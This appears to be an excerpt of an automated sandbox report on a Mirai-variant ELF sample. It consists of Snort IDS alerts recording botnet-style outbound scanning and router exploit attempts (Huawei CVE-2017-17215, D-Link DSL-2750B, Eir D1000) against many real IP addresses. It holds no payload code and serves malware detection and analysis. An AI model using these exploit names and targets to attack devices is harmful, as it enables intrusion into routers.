            Timestamp:192.168.2.23195.88.104.18658248802846457 10/23/22-17:56:43.310934
            SID:2846457
            Source Port:58248
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.202.211.19039010802846380 10/23/22-17:57:07.358204
            SID:2846380
            Source Port:39010
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.163.23453926802027121 10/23/22-17:56:53.373996
            SID:2027121
            Source Port:53926
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.81.17.5141788802846457 10/23/22-17:57:32.444010
            SID:2846457
            Source Port:41788
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.151.52.23146752802846380 10/23/22-17:56:58.267699
            SID:2846380
            Source Port:46752
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.113.203.3441588802846380 10/23/22-17:58:36.861126
            SID:2846380
            Source Port:41588
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.187.4.8841846802846457 10/23/22-17:57:53.239700
            SID:2846457
            Source Port:41846
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2376.141.28.5140116802835222 10/23/22-17:58:09.832463
            SID:2835222
            Source Port:40116
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: fMB6uAXjd0.elfVirustotal: Detection: 48%Perma Link

            Networking

            barindex
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51092 -> 88.221.232.128:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36324 -> 213.235.229.29:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60274 -> 88.99.57.230:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58180 -> 213.162.240.39:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60992 -> 88.221.10.28:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34194 -> 80.12.80.85:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59672 -> 80.78.3.160:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56982 -> 213.139.90.68:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49162 -> 213.232.8.239:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41306 -> 213.219.238.60:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33426 -> 82.64.189.96:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47384 -> 82.223.39.248:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43082 -> 82.219.198.26:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60688 -> 213.176.29.4:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38752 -> 82.81.57.118:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54438 -> 213.32.69.56:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42126 -> 112.125.24.10:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60594 -> 112.74.216.146:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36648 -> 213.188.122.117:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57334 -> 213.10.80.112:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40178 -> 213.229.106.151:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59490 -> 206.225.84.8:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45094 -> 206.210.193.120:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41530 -> 195.52.223.87:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37294 -> 195.201.125.43:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47834 -> 195.20.52.180:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43184 -> 76.189.158.12:7547
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47156 -> 195.123.231.140:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46140 -> 195.32.122.129:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43252 -> 84.128.80.56:80
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36336 -> 34.144.235.14:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37654 -> 84.118.219.78:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43130 -> 84.15.46.14:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58248 -> 195.88.104.186:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35104 -> 89.17.195.152:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34064 -> 112.80.145.196:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40278 -> 112.74.189.175:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42120 -> 112.19.3.212:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53804 -> 112.49.47.8:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37994 -> 95.100.232.27:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34290 -> 95.217.26.224:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37986 -> 95.67.7.53:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39220 -> 213.106.24.192:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37714 -> 213.248.147.167:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:47822 -> 213.87.103.78:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39328 -> 213.176.39.226:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:59810 -> 181.57.98.135:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45154 -> 34.76.74.104:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:45154 -> 34.76.74.104:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35412 -> 18.203.114.123:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:35412 -> 18.203.114.123:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40000 -> 85.214.25.178:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49864 -> 80.151.32.85:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52814 -> 80.84.57.116:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42026 -> 95.179.150.118:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42042 -> 95.216.179.41:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34566 -> 95.129.56.211:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42282 -> 95.129.250.18:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49350 -> 23.193.128.33:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:48436 -> 178.32.17.157:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33928 -> 178.32.61.51:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44374 -> 178.114.128.136:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35814 -> 213.179.157.115:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44438 -> 178.19.152.21:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41114 -> 178.253.43.8:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34100 -> 213.143.19.42:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53806 -> 178.239.222.9:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:34426 -> 213.112.181.219:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55066 -> 72.34.52.16:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46436 -> 88.99.15.83:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52334 -> 88.198.105.107:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35390 -> 88.99.138.117:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56274 -> 88.116.239.154:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37378 -> 88.208.215.135:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42788 -> 88.209.229.164:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56654 -> 185.10.158.21:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:56654 -> 185.10.158.21:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36372 -> 37.26.115.96:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:52366 -> 37.109.51.19:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54910 -> 37.150.237.128:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43434 -> 86.178.155.208:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57176 -> 37.1.210.244:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40992 -> 164.46.38.214:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55812 -> 164.155.193.231:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37474 -> 80.71.226.187:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36402 -> 80.237.207.245:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51578 -> 80.65.132.14:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33538 -> 80.82.122.180:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57926 -> 80.147.77.68:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57610 -> 80.112.100.76:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36586 -> 80.15.36.250:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42736 -> 80.97.209.155:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46846 -> 80.92.18.233:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:37786 -> 95.88.152.120:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57008 -> 95.244.214.148:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55564 -> 95.213.212.122:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51574 -> 95.179.164.220:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54192 -> 95.183.53.85:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34972 -> 88.80.170.43:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50644 -> 95.100.184.177:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52542 -> 95.101.58.140:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35632 -> 95.90.158.125:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60466 -> 95.220.219.5:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53926 -> 95.101.163.234:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40924 -> 88.216.98.238:80
            Source: TrafficSnort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:54360 -> 197.0.137.137:7547
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39222 -> 93.188.246.186:80
            Source: TrafficSnort IDS: 2023548 ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE 192.168.2.23:56284 -> 79.106.155.15:7547
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49044 -> 5.9.198.19:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39684 -> 5.189.134.8:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60302 -> 5.39.174.195:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53962 -> 5.2.203.46:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38736 -> 5.189.103.93:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38518 -> 171.4.45.201:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49368 -> 171.249.80.29:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35562 -> 5.235.250.211:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44668 -> 178.238.111.24:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:39950 -> 178.32.150.68:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43574 -> 178.79.232.192:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37048 -> 178.73.244.31:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:44648 -> 171.238.159.194:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42224 -> 200.55.134.174:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52184 -> 88.221.76.116:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59074 -> 95.217.14.76:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38284 -> 88.99.163.167:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48552 -> 95.110.227.64:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56796 -> 95.163.80.197:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41092 -> 181.214.9.31:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55410 -> 88.235.181.253:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54170 -> 181.214.78.47:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46250 -> 88.148.49.139:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48116 -> 88.249.39.35:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48290 -> 95.156.252.249:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42538 -> 181.52.121.14:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:38248 -> 181.48.102.218:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:45410 -> 181.208.96.165:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:36714 -> 197.166.86.138:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55770 -> 181.198.64.137:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55264 -> 73.36.116.166:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37012 -> 23.35.133.102:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:37012 -> 23.35.133.102:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:55642 -> 169.197.105.125:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33140 -> 213.133.224.133:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41982 -> 213.250.35.124:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:40422 -> 213.159.7.2:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51602 -> 213.16.50.170:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:49974 -> 213.33.159.86:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35168 -> 178.12.185.184:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38796 -> 112.34.111.128:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46752 -> 213.151.52.231:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:33414 -> 213.27.82.15:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54474 -> 169.62.56.114:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60102 -> 112.167.1.31:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54618 -> 112.213.104.162:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38904 -> 112.124.66.58:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41282 -> 95.249.98.191:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59226 -> 95.110.133.246:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49750 -> 95.70.194.64:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40732 -> 95.101.14.70:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:46182 -> 178.80.80.231:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38242 -> 112.167.187.229:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46156 -> 112.161.239.163:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56278 -> 112.157.27.217:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56320 -> 18.185.14.121:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:56320 -> 18.185.14.121:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42868 -> 181.52.121.14:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:50494 -> 206.189.140.13:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:56510 -> 85.13.140.103:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:37756 -> 85.13.150.203:80
            Source: TrafficSnort IDS: 2846380 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:58726 -> 206.189.150.184:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51998 -> 85.10.214.218:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:51372 -> 188.138.163.224:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:53442 -> 188.25.13.180:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57090 -> 85.121.125.181:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:43600 -> 85.24.191.221:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:57850 -> 85.118.202.136:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:42208 -> 188.234.248.26:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:35646 -> 85.195.140.206:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:60890 -> 188.85.68.201:80
            Source: TrafficSnort IDS: 2846457 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:54270 -> 188.166.243.186:80
            Source: TrafficSnort IDS: 2841623 ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound) 192.168.2.23:41010 -> 79.143.177.117:80
            Source: TrafficSnort IDS: 2835221 ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version) 192.168.2.23:41010 -> 79.143.177.117:80
            Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60440 -> 88.98.101.159:80
